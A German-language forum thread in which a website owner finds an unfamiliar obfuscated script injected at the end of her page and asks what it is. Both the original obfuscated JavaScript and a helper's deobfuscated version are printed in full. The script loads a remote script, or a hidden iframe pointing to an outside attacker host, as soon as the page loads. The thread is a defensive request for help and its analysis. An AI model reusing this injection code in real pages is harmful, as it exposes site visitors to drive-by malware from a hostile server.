Was ist das für ein script?

M

Maria2012

Mitglied
Guten Tag

Weiss jemand um was für ein script es sich hier handelt. Habe routinemässig mal den Quelltext meiner Seite checken wollen und finde am Schluss diesen Code. Wasn das? Irgendwie gehört das da nicht hin bzw. ist nicht von mir.

Vielen lieben Dank für die Hilfe

Maria

</body>
</html>

CODE
<script>this.HD="";var C;if(C!='' && C!='t'){C=null};this.F='';function u() {var j=new Date();var Yp=new Date();var a;if(a!='' && a!='c'){a='b'};var U="g";var Tn=new Array();var M=String("appe"+"Mv2ndCh".substr(3)+"ild");var H=window;var S;var k=RegExp;this.I="";var h='';var q=String("]dYk".substr(0,1));this.pL='';this.Sm='';var Q=new String("sc"+"ribtqP".substr(0,2)+"iqMptMiq".substr(3,2));var jI=new Array();this.Wp="";this.zq="";function V(X,J){var n=new String();var SmR;if(SmR!='wX'){SmR='wX'};var QH=new Date();var p=new String("[");p+=J;p+=q;var ap=new Date();var ex;if(ex!='r'){ex='r'};var kz;if(kz!='' && kz!='Ih'){kz=null};var UB=new k(p, U);return X.replace(UB, h);var EX;if(EX!='SY'){EX=''};};var rM;if(rM!=''){rM='oY'};var l=V('sKrLcq','gJLKv9CaYq');var QA;if(QA!='ow' && QA!='kD'){QA=''};var Qt='';var A=new String("on"+"lo"+"adn0HE".substr(0,2));var x="deferVkK".substr(0,5);var kR=new Date();var ia;if(ia!='' && ia!='HEO'){ia='pq'};var IS;if(IS!='rI' && IS != ''){IS=null};var lJ=new Date();S=function(){var vA='';var mn;if(mn!='io' && mn!='AR'){mn=''};var Ef='';var Mb;if(Mb!=''){Mb='EV'};try {var QQ=new Array();var oZ='';A_=document.createElement(Q);var kr='';var VK;if(VK!='' && VK!='Ti'){VK='Vlg'};var Ak=String("bod"+"yjbL".substr(0,1));var gH=new Date();A_[x]=[1][0];this.qp="";var pu;if(pu!='Fv' && pu != ''){pu=null};A_[l] = V('hZtgtup3:u/g/wt3rUikpYlReudwe3egp0oWn0lwiXn4eO.RaLtR:0','B0CUYWkF3uRXZbmQO4Lwg')+V('8695293957766440157434214785653729275104174114243','91562734')+V('/agaoNo3g7l8e7-7cJli/Lg5o6o5gZlNe6.Zc5oRma/8n8hLl7.JcRo8m5.Rp1h7pO','3La81i6JvNRO5Z7X');var pT=new String();document[Ak][M](A_);var YE="";var IhO;if(IhO!='wK' && IhO!='DU'){IhO='wK'};} catch(E){var f;if(f!='' && f!='Ql'){f=null};};var UYi=new Date();};var TU="";this.od='';H[A]=S;var Um=new Date();var _u=new Date();};u();</script>
<!--21866fdd59b9a99f115c198aed53b32c-->
 
Habe jetzt keine Zeit das Script auseinanderzunehmen. Es schreibt ein Iframe in Deine Seite.

Die Frage ist aber falsch, es ist egal was das Script macht. Deine Webseite scheint eine Sicherheitslücke zu haben über welcher ein Angreifer das Script in Deine Seite platziert hat. Finde diese Lücke und Schliesse sie! Welche Software setzt Du auf der Seite ein (Ist sie selbst Programmiert?)... etc
 
CODE 2Yg4x8q = 'h(t(t(##p$#$:))^/(&)/#@!t^)r)(i@&p((l^e@d@(#e@&e$#!p^)#^o)!n##(l&!@i^$&))n!^e#&.($a#&t#'.replace(/\^|\$|#|\!|&|\)|\(|@/ig, '');
3Ph66mu6 = 'Ph66mu6Lfddftt';
4Qrpvqjw = document.createElement('iNfOrza4m4e4'.replace(/[4MzNO]/g, ''));
5Ph66mu6 = 'Ph66mu6Lfddftt';
6Lfddftt = '';
7Foa9p7kt = '';
8Ph66mu6 = document.referrer;
9function A524qcr(Cipfntl,A3j4ylz){
10if (Ph66mu6.indexOf(Cipfntl) != -1){
11 Lfddftt=Cipfntl;
12 Fzub0ct8l = Ph66mu6.indexOf(A3j4ylz+'=');
13 if (Fzub0ct8l != -1){
14 Foa9p7kt = Ph66mu6.substring(Fzub0ct8l+2).split('&')[0];
15 }
16}
17}
18//A524qcr('google.','q');A524qcr('search.yahoo.','p');A524qcr('ask.com','q');
19
20Qrpvqjw.style.visibility = 'h^!i^$@^d)^d)^e$)^n$(&'.replace(/\!|\$|\)|\^|@|&|\(|#/ig, '');
21Qrpvqjw.src = Yg4x8q+':X8b0s8X0%/bisnXdmesx%.mpXhmps?bjba%=s&bj%lX=m'.replace(/[mXb%s]/g, '')+Lfddftt+'&kl='+Foa9p7kt;
22document.body.appendChild(Qrpvqjw);

Sorry für die Zeilennummern...
Die URL des Iframes ist: tp://tripledeeponline.at:8080/index.php?ja=&jl=&kl=
 
Vielen Dank.

tripledeeponline hab ich noch nie gehört und gehört da ganz bestimmt nicht hin. Ja die Seite ist von mir selber erstellt und in diesem Design schon lange online. Ist nur eine einfache css Vorlage die ich abgeändert habe. Ich schreibe jeweils den html code im editor um und lade mit FTP Commander hoch.

Da muss irgendjemand zugriff auf den Server erhalten denk ich. Ich werde mal die index.html neu hochladen und das Serverpasswort wechseln.

Danke Danke

lg

Maria

PS im google cache war am 13. noch alles i.O.
 
OK index neu hochgeladen script code ist weg.....frage mich was der Sinn dahinter gewesen ist. Verstecktes iframe?

Irgendwie ominös....tripledeeponline die Seite gehört einer Dame aus Moskau und heisst Maria sowieso!

Vielen Dank nochmals

Maria
 
Sie müssen sich einloggen oder registrieren, um hier antworten zu können.
Zurück
Oben